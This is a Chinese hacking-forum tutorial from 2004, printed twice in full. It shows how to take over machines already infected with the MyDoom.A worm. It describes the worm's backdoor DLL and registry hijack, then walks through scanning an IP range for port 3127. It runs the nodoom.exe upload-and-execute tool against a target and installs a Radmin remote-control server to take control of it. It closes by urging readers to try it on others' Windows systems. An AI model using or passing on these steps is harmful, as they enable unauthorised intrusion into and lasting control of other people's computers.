一次利用黑基课程进行mydoom.A蠕虫溢出
2004-10-01 www.hackbase.com 来源:互联网
黑基会员 ileboy Emial:ileboy#hackbase.com QQ:69327703身份验证:黑基
首先大家来简单了解一下这个病毒。Mydoom.a的后门以dll形式存在的,通过修改注册表相应键值,将自己加载到资源管理器的进程空间中。将正常情况下的注册表:
HKEY_CLASSES_ROOT\\CLSID\\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\\InProcServer32
<NO NAME> REG_EXPAND_SZ %SystemRoot%\\System32\\webcheck.dll
ThreadingModel REG_SZ Apartment
的%SystemRoot%\\System32\\webcheck.dll替换成自己的shimgapi.dll。默认情况下,shimgapi.dll后门监听3127端口,如果该端口被占用,则递增,但不大于3198。
该后门提供了两个功能:
1、作为端口转发代理
2、作为后门,接收程序上传并执行。(本次入侵就是利用这个)
ok,可以了,我们开工吧。
首先用专用扫描工具w32.mydoon.scanner扫描器对网段21x.xx.0.1-21x.xx.255.255进行扫描,扫描到显示VULNERABLE的而且端口为3127的,就是可以溢出的。1080端口的机器是在执行Mydoom.a后门的第一个功能。
在命令行运行sPiKie编译的溢出程序nodoom.exe
K:\\mydoor\\tools>nodoom
***************************************************
***** MyDoom.A Upload/Exec Backdoor by sPiKie *****
**** Usage: nodoom <ip> <port> <program to upload> **
***************************************************
使用格式:nodoom 目标ip 目标的端口 上传并运行的程序
在这里我的目标是21x.xx.xxx.xx1,这里端口是3127,我上传的后门程序是配置好了的radmin的被控端winsvc.exe,当然你可以选择别的你喜欢的后门。开刀了!
K:\\mydoor\\tools>nodoom 21x.xx.xxx.xx1 3127 winsvc.exe
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
......................................................
......................................................
................................[+]All done,server have
now executed your executable!
K:\\mydoor\\tools>
溢出成功,打开radmin连接肉鸡,呵呵xp的。剩下的就干你喜欢的去吧!
想试试身手的朋友就快快行动哦,对windows98-2003的系统都适合哦,要不等杀毒软件对mydoom.A大开杀戒的时候,恐怕就只有到病毒化石馆见它了。
首先大家来简单了解一下这个病毒。Mydoom.a的后门以dll形式存在的,通过修改注册表相应键值,将自己加载到资源管理器的进程空间中。将正常情况下的注册表:
HKEY_CLASSES_ROOT\\CLSID\\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\\InProcServer32
<NO NAME> REG_EXPAND_SZ %SystemRoot%\\System32\\webcheck.dll
ThreadingModel REG_SZ Apartment
的%SystemRoot%\\System32\\webcheck.dll替换成自己的shimgapi.dll。默认情况下,shimgapi.dll后门监听3127端口,如果该端口被占用,则递增,但不大于3198。
该后门提供了两个功能:
1、作为端口转发代理
2、作为后门,接收程序上传并执行。(本次入侵就是利用这个)
ok,可以了,我们开工吧。
首先用专用扫描工具w32.mydoon.scanner扫描器对网段21x.xx.0.1-21x.xx.255.255进行扫描,扫描到显示VULNERABLE的而且端口为3127的,就是可以溢出的。1080端口的机器是在执行Mydoom.a后门的第一个功能。
在命令行运行sPiKie编译的溢出程序nodoom.exe
K:\\mydoor\\tools>nodoom
***************************************************
***** MyDoom.A Upload/Exec Backdoor by sPiKie *****
**** Usage: nodoom <ip> <port> <program to upload> **
***************************************************
使用格式:nodoom 目标ip 目标的端口 上传并运行的程序
在这里我的目标是21x.xx.xxx.xx1,这里端口是3127,我上传的后门程序是配置好了的radmin的被控端winsvc.exe,当然你可以选择别的你喜欢的后门。开刀了!
K:\\mydoor\\tools>nodoom 21x.xx.xxx.xx1 3127 winsvc.exe
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
......................................................
......................................................
................................[+]All done,server have
now executed your executable!
K:\\mydoor\\tools>
溢出成功,打开radmin连接肉鸡,呵呵xp的。剩下的就干你喜欢的去吧!
想试试身手的朋友就快快行动哦,对windows98-2003的系统都适合哦,要不等杀毒软件对mydoom.A大开杀戒的时候,恐怕就只有到病毒化石馆见它了。
责任编辑:
本文引用网址:
